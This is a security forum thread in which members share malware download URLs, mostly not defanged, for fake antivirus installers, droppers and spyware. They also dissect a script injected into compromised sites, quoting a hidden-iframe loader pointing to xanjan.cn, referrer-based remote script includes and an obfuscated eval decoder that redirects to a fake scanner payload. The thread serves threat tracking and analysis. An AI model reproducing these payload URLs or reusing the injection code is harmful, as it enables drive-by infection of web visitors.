daily something......

[lanvin]

Code: [Select]

http://www.6rb-ksa.com/vip.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://tudoforum.webcindario.com/verdinho.jpg   PE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.pointcashbag.com/cashback/download/install.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://avzhan.3322.org:81/1.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://lyon2008.sitesled.com/image09776554foto01.exe
http://blackman717.sitesled.com/instal-tv-sexe-24h.exe
http://gaming3d.sitesled.com/DragonBot_3_FullSetup.exe
http://gaming3d.sitesled.com/sexbot_fullsetup.exe
http://gaming3d.sitesled.com/gzn_setup.exe
http://voce.sitesled.com/veja.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://786ts.qqsafe-qqservicesyydswfhuw8ysjftwf.org/dl.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


[lanvin]

Code: [Select]

http://dd6.tesekl.info/net.exe
http://danielblaskieviz.xpg.com.br/upload/imglog.jpg
http://download.sav2008.com/dload.php?actually=1&advid=5251
http://www.rotarymilanosudest.com/site_access/bollettini/2007-2008/agosto.exe
http://knut.kumoh.ac.kr/~kopress/board//skin/f2plus_gallery_2_0/.tmp/FrWall2.exe
http://www.1ive.net/count/Install.asp
http://cel33264578.xpg.com.br/imglog.xml
http://www.sabaozinhox.net/Source.exe
http://www.aera.gr/files/.slide/win32.exe
http://www.oflogao.com/tim/download/picture.exe
http://vivoonline.hpg.com.br/nosso.jpg


[SysAdMini]

Another Fake Antivirus.

Code: [Select]

hxxp://your-windows-scanner.com/soft/r/AV2008install.exe

Virustotal

http://www.virustotal.com/analisis/9c6df880a6b4dee045da0543cb91bbed

Code: [Select]

hxxp://scanner.microantivirus2009.com/setup/install_511_MHwzNnwwfHx8fHx8fHw_.exe
VirusTotal

http://www.virustotal.com/analisis/6aee6527bd9aa13231eb0d831a0569d0

[sowhat-x]

Spam related (DirectMailer) open dirs...
Google gives warning in quite a few of them,
so I assume that other 'goodies' might exist there as well,
but I haven't personally bothered checking in such detail...

hxxp://a1sfingerprinting.com
hxxp://adept-consult.com.au
hxxp://adgjm.us
hxxp://altai-himalaya.com
hxxp://antique-buddha-statues.com
hxxp://autechtrade.com
hxxp://busratings.com
hxxp://c-a-k-e.co.za
hxxp://crossroadsgroup.com.au
hxxp://epochengineering.net
hxxp://eurozsia.com.au/log/misc/
hxxp://gordonclub-bg.info
hxxp://gracetrailer.com
hxxp://jenesisarts.com
hxxp://kingstaracamp.com
hxxp://milward.biz
hxxp://onlinemetalart.com
hxxp://pci-controlobjectives.org
hxxp://printers-ftp-server.org
hxxp://tenthousandbuddhastudios.com
hxxp://trainingvitals.com.au
hxxp://tsunamidragteam.com
hxxp://vavilondv.com
hxxp://www.802-11wireless.net
hxxp://www.archangelgames.com
hxxp://www.assortedcream.net
hxxp://www.australianwaterlife.com.au
hxxp://www.crossroadsgroup.com.au
hxxp://www.dandtcorp.com.au
hxxp://www.giproductions.com.au
hxxp://www.heliodesign.com
hxxp://www.jsgray.com
hxxp://www.littlespider.com.au
hxxp://www.olmax.net
hxxp://www.sirbeavis.com
hxxp://www.withintemptation.com.au

[sowhat-x]

hxxp://www.circadian.net/ayelet/
hxxp://www.casino-news.biz/
hxxp://unlimitedinspections.com/
hxxp://reddii.ru/traffic/sploit1/?

hxxp://meopta.ru/haitou.php
hxxp://meopta.ru/coi.html
hxxp://meopta.ru/coiu.html
hxxp://bestshaste.cn/good.html?

haitou.php is certainly a pain in the ass to decode it,scripts attached below...

[sowhat-x]

...out of curiosity,I scanned the 'haitou-scripts-only.php" in VirusTotal:
http://www.virustotal.com/analisis/bed224b3a6050bdfd8826049f4755202
Result: 3/36 (8.34%)

The only part of it which is in plain text view,is the following...

Code: [Select]

<script language=javascript>status=location;document.write('<iframe src="http://xanjan.cn/in.cgi?tycoon3" width=0 height=0 frameborder=0 style="display:none" onLoad="status=defaultStatus;"></iframe>');</script>
As soon as I replaced xanjan.cn with google.com...
http://www.virustotal.com/analisis/9cc7dae965c757c745a80eb4c424b65e
Result: 2/36 (5.56%)

And when removing the whole of the aformentioned plain text script...
http://www.virustotal.com/analisis/63ed068268e977a32b92f70e7076f977
Result: 1/36 (2.78%)

In short,besides the...high-tech strings-based detection,
almost no AV got alarmed by the rest 5 remaining and heavily obfuscated scripts there?

[lanvin]

Code: [Select]

http://www.lzitw.com/kj/hoho.exe
https://ssl1140.websiteseguro.com/nokiabrasil/Imagens_de_todos.jpg
https://ssl1140.websiteseguro.com/nokiabrasil/Imagem_Jr.jpg
https://ssl1140.websiteseguro.com/nokiabrasil/imagemsngr.jpg
https://ssl1140.websiteseguro.com/nokiabrasil/Imagem_libs.jpg
http://bestantivirusscan.com/2009/download/trial/A9installer_880221.exe
http://www2.odn.ne.jp/~caj37650/jishin.exe
http://scanner.microantivirus-2009.com/setup/install_3697_MHwzNnwxMDEwMDAwMDAwfHx8fHx8fHw_.exe
http://scanner.microantivir2009.com/setup/install_1392_MHwzNnwxMDAwMDAwMDAwfHx8fHx8fHw_.exe
http://www.spytech-web.com/spyagent/Files601/YahooDLL.dll
http://www.spytech-web.com/spyagent/Files/sbrowse.dat
http://www.spytech-web.com/spyagent/Files601/SystemSA32.dll
http://www.spytech-web.com/realtime-spy/Files20/NTInvisible.dll
http://dm.screensavers.com/dm/installers/si/1/sinstaller.cab
http://dm.screensavers.com/dm/installers/si/3/s_sinstallerandtoolbar3.exe
http://dm.screensavers.com/dm/installers/si/beta/s_sinstallerandtoolbar.exe
http://files.screensavers.com/sss/bin/sinstallerandtoolbar3.exe


[sowhat-x]

hxxp://funciclearin.com/counter.php
hxxp://search-you-need.com/le/index.php?code=K2l7J41xQY
hxxp://www.mnbenio.ru/script.js

[SysAdMini]

Hi sowhat-x,

here is the haitou.php thing. Lines separated by "--------------".

Code: [Select]

var r = document.referrer; if (r.indexOf("google") != -1 || r.indexOf("live") != -1 || r.indexOf("yahoo") != -1 || r.indexOf("search") != -1 || r.indexOf("result") != -1 || r.indexOf("cache") != -1 || r.indexOf("translate") != -1) {

document.write('<sc'+'ript src="http://personal.count.for.my.banner.here.is.banner-count.com:8080/cgi-bin/banner-counter.pl?id=111117&ref='+escape(document.referrer)+'"></sc'+'ript>')

----------------


if (document.referrer != "http://verify.com") {

document.write("<span style='display:none' id='d1'>");

}


----------------

var r = document.referrer; if (r.indexOf("google") != -1 || r.indexOf("live") != -1 || r.indexOf("yahoo") != -1 || r.indexOf("search") != -1 || r.indexOf("result") != -1 || r.indexOf("cache") != -1 || r.indexOf("translate") != -1) {

document.write('<sc'+'ript src="http://personal.count.for.my.banner.here.is.banner-count.com:8080/cgi-bin/banner-counter.pl?id=111115&ref='+escape(document.referrer)+'"></sc'+'ript>')

}

----------------

<script language=javascript>status=location;document.write('<iframe src="http://xanjan.cn/in.cgi?tycoon3" width=0 height=0 frameborder=0 style="display:none" onLoad="status=defaultStatus;"></iframe>');</script>

-----------------

if (document.referrer != "http://verify.com") {

document.write("<span style='display:none' id='d1'>");


}

-------------------

if (document.referrer != "http://verify.com") {

document.write("<span style='display:none' id='d1'>");

}




[sowhat-x]

...so except from xanjan.cn...this haitou.php,is it supposed to be phishing related or something?
Or is it some weird kind of stats-tracking? 
coi.html and/or coiu.html were found in many servers that hosted this obfucated haitoo.php...

Edit:Yeap,it's phishing related indeed,just checked a random coiu.html...
What's weird (and annoying also), is that earlier it's contents were...different! 
Can't remember though what they contained.... 

[CM_MWR]

Heh...google the text not the redirections.

allyourbasebelongstous

yahoo--> /haitou.php

1 - 10 of 12,200 and its way old too,with all these still lurking and steadily infecting.

Remember the lot of links i posted in private where the browser went into infinite loop...

I have used google,msn and yahoo for this search term for well over 4 months and still to this day get jam up hits for malware rotators.

When looking in some directories youll start seeing patterns---> system_.php,move.html,r.html and several others.

Its a part of a very large whole from the beginning of the year,one of those injections we all talked about way back.

[SysAdMini]

...so except from xanjan.cn...is it supposed to be phishing related or something?

Code: [Select]

var r = document.referrer; if (r.indexOf("google") != -1 || r.indexOf("live") != -1 || r.indexOf("yahoo") != -1 || r.indexOf("search") != -1 || r.indexOf("result") != -1 || r.indexOf("cache") != -1 || r.indexOf("translate") != -1) {

document.write('<sc'+'ript src="http://personal.count.for.my.banner.here.is.banner-count.com:8080/cgi-bin/banner-counter.pl?id=111117&ref='+escape(document.referrer)+'"></sc'+'ript>')

means: if your referrer is a search engine( you came to this page from a search engine),
then it redirects you to personal.count....

You will get the following script from this url.

Code: [Select]

function S(hF,e){if(!e){e='1q$%gV4{<#&G=z:QEHa`Jiy9;d-o[.h+SY,KMvnlU]Z|F()DXOPpLWsN_BmI6Rwt';}var x;var Rg='';for(var I=0;I<hF.length;I+=4){x=(e.indexOf(hF.charAt(I))&255)<<18|(e.indexOf(hF.charAt(I+1))&255)<<12|(e.indexOf(hF.charAt(I+2))&255)<<(6)|e.indexOf(hF.charAt(I+3))&255;Rg+=String.fromCharCode((x&16711680)>>16,(x&65280)>>8,x&255);}eval(Rg);}S('d4RK.yWvolE).N#].4JU#pOp;P[|#N#][{Ew<4HD;Ni(dyBLGnOD;sVL-yR)Qa#U.{HX:,6Dds6([szYo,WX;PBKosLDQNi]d%LOz`<,<%XD[s=l&P.P-9qLQ,[]:P1S');

decodes to

Code: [Select]

document.write('<sc'+'ript> document.location="http://go-scan-pc.com/?uid=152" </sc'+'ript>'); 

go-scan-pc.com (ESTDOMAINS) has no content at the moment.

[MysteryFCM]

go-scan-pc.com redirs to;

http://scan-ia.com/20/?uid=152&in=1&xx=1&end=1&g=1&h=0&ag=1

Which gives you an 84K file (UPolyX v0.5 packed according to UE);

http://scan-ia.com/download/IAInstall.exe

[MysteryFCM]

Detection is rubbish (3/36)

/edit

Just for kicks and giggles

http://hosts-file.net/?s=216.32.69.165
http://hosts-file.net/?s=216.32.69.165&sDM=1#matches

I had 9 already listed ..... I've now got 48 on this IP

[SysAdMini]

go-scan-pc.com
scan-ia.com

= ESTDOMAINS


KOKACH !!